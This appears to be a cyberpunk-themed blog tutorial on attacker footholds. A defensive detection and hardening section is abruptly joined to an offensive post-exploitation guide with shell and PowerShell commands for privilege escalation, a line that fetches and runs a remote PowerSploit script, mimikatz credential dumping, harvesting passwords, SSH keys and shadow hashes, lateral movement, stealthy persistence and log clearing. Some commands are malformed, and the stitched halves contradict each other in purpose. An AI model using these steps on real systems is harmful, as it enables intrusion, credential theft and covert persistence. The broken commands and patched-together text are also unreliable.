You wake up under neon skies, rain-soaked pavement gleaming with electric promise, the city’s hum vibrating like a motherboard on fire. Slick cables drip luminescent saliva down brick walls, holograms flicker, dragons in digital form, code spitting flame. In this cyberpunk carnival, security is not optional, it is every heartbeat, every spark. Out there in the shadows, the foothold has been gained. The intruder is inside the gates. You must learn to fight back, to understand what “gaining ground, with the foothold down” truly means.

Imagine: you ride a motorcycle through endless rain, your visor reflecting lines of code cascading from the sky, the city’s systems under threat from silent spectres in the net. Each moment counts, each packet could betray you, each port could be a trap. For newcomers in this mad world, grasping what a foothold is, how it is established, and how you can find and uproot it, defines the boundary between control and chaos.

What Does “Foothold” Mean in Cybersecurity

A foothold is your adversary’s first toes in the door, remote-access established via phishing, weak credentials, insecure service, or an XSS vector. Once inside, they can pivot, escalate privileges, gather intelligence, or exfiltrate data. As a defender you must think like them: where they plant that toe, how they dig in, what tools they use to widen the gap.

Understanding the anatomy:

• Entry vector: how the attacker got in, phishing email link, exposed RDP port, vulnerable web app.
• Persistence: how they stay, backdoors, scheduled tasks, registry run keys.
• Privilege escalation: getting admin, root, SYSTEM access.
• Lateral movement: hopping from machine to machine.
• Covering tracks: log tampering, timestamp manipulation.

First Steps: Detecting a Foothold

You’re scanning internal logs, alert dashboards flicker, something smells wrong. Here’s what to search for:

• Unusual user account creations.
• Login attempts at odd hours, from unusual IPs.
• Services enabled that should be disabled.
• Scheduled tasks or cron jobs you did not configure.
• New SSH keys added to authorised_keys.

Practically, use simple scripts to help:

bash
# List recently created users on Linux
sudo awk -F: '($3>=1000)&&($7!="/usr/sbin/nologin") { print $1 }' /etc/passwd \
    | while read user; do 
        sudo chage -l "$user"
    done

This bash snippet lists users with UID≥1000 (regular accounts), then shows their password ageing. If a user has just been added, password expiry or other fields may be freshly set, triggering suspicion.

Digging Deeper: Confirming and Analysing the Threat

Once you detect signs, you need evidence without tipping off the intruder. Maintain logs, take snapshots, preserve forensics. Use Python or PowerShell for inspection:

python
# Python: find suspicious processes using network sockets
import psutil

for proc in psutil.process_iter(['pid','name','username','connections']):
    conns = proc.info['connections']
    for conn in conns:
        if conn.status == 'LISTEN' and conn.laddr.port not in (22,80,443,3306):
            print(f"Process {proc.info['name']} (PID {proc.info['pid']}) "
                  f"listening on unusual port {conn.laddr.port}")

Warning: Running code that interacts with live systems must be done carefully, ideally in read-only or auditing mode. Never deploy invasive scripts unless you have explicit authorisation.

In Windows, via PowerShell:

powershell
# PowerShell: get all services set to autostart that are not recognised
Get-Service | Where-Object { $_.StartType -eq 'Automatic' -and
    $_.Status -eq 'Running' } |
    ForEach-Object {
        $svc = $_
        $bin = (Get-WmiObject Win32_Service -Filter "Name='$($svc.Name)'").PathName
        if ($bin -notmatch 'C:\\Windows\\') {
            Write-Output "Unknown service $($svc.Name) with binary $bin"
        }
    }

That flags services marked as autostarted, running and whose binaries do not live under standard system paths, with reasonable chance some are malicious.

Disrupting the Ground: Removal and Hardening

When you find a foothold, remove it, but be careful. Blind removal could crash systems. Steps:

1. Quarantine: isolate affected machines from network.
2. Snapshot: take memory, disk images for forensic analysis.
3. Catalogue artefacts: users, services, scheduled tasks, startup items, system files altered.
4. Remove malicious components: user accounts, backdoor executables, registry keys, cron jobs.
5. Patch vulnerabilities: update software, close open ports, enforce strong passwords.
6. Change credentials: especially for compromised or high-privilege accounts.
7. Audit logs: check for data exfiltration, determine scope of damage.

Hardening techniques:

• Enforce least privilege: users get exactly what they need, no more.
• Network segmentation: limit lateral movement.
• Multi-factor authentication: for all remote and admin access.
• Application whitelisting: only authorised apps execute.
• Continuous monitoring: use EDR/IDS to spot anomalies.

Tools You Should Master

To fight shadows you need weapons. Start with:

• Wireshark: packet inspection, anomaly detection.
• Sysinternals suite (Windows): Process Monitor, Autoruns, TCPView.
• Auditd and SELinux (Linux): track system calls, enforce policy.
• Splunk, ELK stack: centralised log aggregation and alerting.

Practical skill: write small scripts. For example, monitor auth logs on a Linux box regularly:

bash
# cron job: run every hour, append failed SSH attempts to report
0 * * * * grep "Failed password" /var/log/auth.log | tail -n 20 >> /var/log/ssh-failures.log

Mindset: Tipping the Scales

You are not just a checklist-cutter. You are bloodhound and shadow. The attacker has taken ground, but that is not defeat. A foothold is weakness, bait. Study it. Understand why it succeeded, was it misconfiguration, human error, software bug? Every foothold tells a story.

Gaining Ground, With the Foothold Down

Aim

To teach you how to consolidate access, expand privileges and move laterally once a foothold has been established in a target system or network.

Learning outcomes

By the end of this guide you will be able to:
- Elevate privileges on a compromised host using common misconfigurations or credential harvesting.
- Discover additional systems and services within the network from the compromised host.
- Harvest and reuse credentials effectively.
- Maintain persistence reliably after gaining elevated access.
- Move laterally to additional machines or segments.

Prerequisites

• Access to a compromised host (Windows, Linux or macOS) with at least limited user rights.
• Basic knowledge of operating-system internals (user accounts, services, process privileges).
• Familiarity with command-line tools (PowerShell for Windows; Bash or Python for Unix-like systems).
• Tools such as impacket, mimikatz (on Windows), ssh, samba, and network-scanning utilities.
• A safe lab environment (virtual machines or isolated network) for experimentation.

Step-by-Step Guide

1. Assess local privileges and environment

• On Windows, run:

powershell
  whoami /priv
  Get-LocalGroupMember Administrators
  systeminfo | Select-String "Domain"

• On Linux/macOS, run:

bash
  id
  sudo -l
  uname -a
  env | grep -E 'PATH|HOME|USER'

• Record open ports, installed services, and environment variables to find misconfigurations.

2. Privilege escalation

• Windows: Use tools such as PowerUp.ps1 to search registry and service misconfigurations. Load into PowerShell:

powershell
  iex (IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1'))
  Invoke-PowerUp

• Unix-like systems: Check for SUID binaries, insecure sudo rules, or weak file permissions:

bash
  find / -perm -4000 -type f 2>/dev/null
  sudo -l
  ls -la /etc/sudoers /etc/sudoers.d/

• Exploit any discovered misconfigurations to elevate privileges to root or SYSTEM.

3. Credential harvesting

• Windows: Extract credentials from memory with mimikatz:

powershell
  Invoke-Expression -Command "mimikatz # sekurlsa::logonpasswords exit"

• Unix: Look for plaintext passwords or SSH keys:

bash
  grep -R "password" /home/*
  find /home -type f -name "id_rsa" -or -name "*.pem"

• Capture hashes in /etc/shadow or Active Directory dumps for offline cracking.

4. Lateral movement

• Use harvested credentials with ssh (Unix) or WinRM / SMB (Windows):

bash
  ssh user@otherhost

powershell
  Enter-PsSession -ComputerName otherhost -Credential (Get-Credential)

• Use Impacket tools such as psexec.py or wmiexec.py to execute remote commands where appropriate.

5. Persistence mechanisms

• Windows: Create scheduled tasks or register services:

powershell
  New-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Updater" -Value "C:\Windows\system32\updater.exe"
  schtasks /Create /SC ONLOGON /TN "Updater" /TR "C:\Windows\system32\updater.exe"

• Linux/macOS: Add entries to ~/.bashrc, cron, launchd, or system startup scripts:

bash
  echo "/usr/local/bin/myscript.sh &" >> ~/.bashrc
  (crontab -l; echo "@reboot /usr/local/bin/myscript.sh") | crontab -  

• Ensure persistence is stealthy; clean up logs or traces if needed.

6. Network discovery and mapping

• Scan local network from compromised host:

bash
  nmap -sP 192.168.1.0/24
  arp -a

• On Windows use PowerShell to query AD or DNS:

powershell
  Get-ADComputer -Filter * -Property Name,OperatingSystem
  Resolve-DNSName -Name otherhost.domain.local

• Identify high-value machines (domain controllers, file servers, etc.).

7. Maintaining stealth

• Limit noisy operations during off-peak hours.
• Use native tools (PowerShell, Bash) rather than dropping new binaries.
• Remove credentials or tools leftover, clear logs where authorised in lab.

Practical code snippets summary

bash
# Example: On Linux, find SUID binaries and list writable ones
find / -perm -4000 -type f 2>/dev/null | while read f; do
  if [ -w "$f" ]; then
    echo "Writable SUID: $f"
  fi
done

powershell
# Example: Retrieve domain admin group members
Import-Module ActiveDirectory
Get-ADGroupMember -Identity "Domain Admins" | Select-Object Name,SamAccountName

Engage with these steps practically. Apply them in a safe environment. Building skill through doing consolidates understanding.

Remember, even when things seem broken, and the rain wraps you in digital gloom, small acts of precision, code audits, patching, policy enforcement, constant observation, turn the tide. You reclaim ground, inch by inch, until the intruder’s toes are pulled out and thrown back into the void.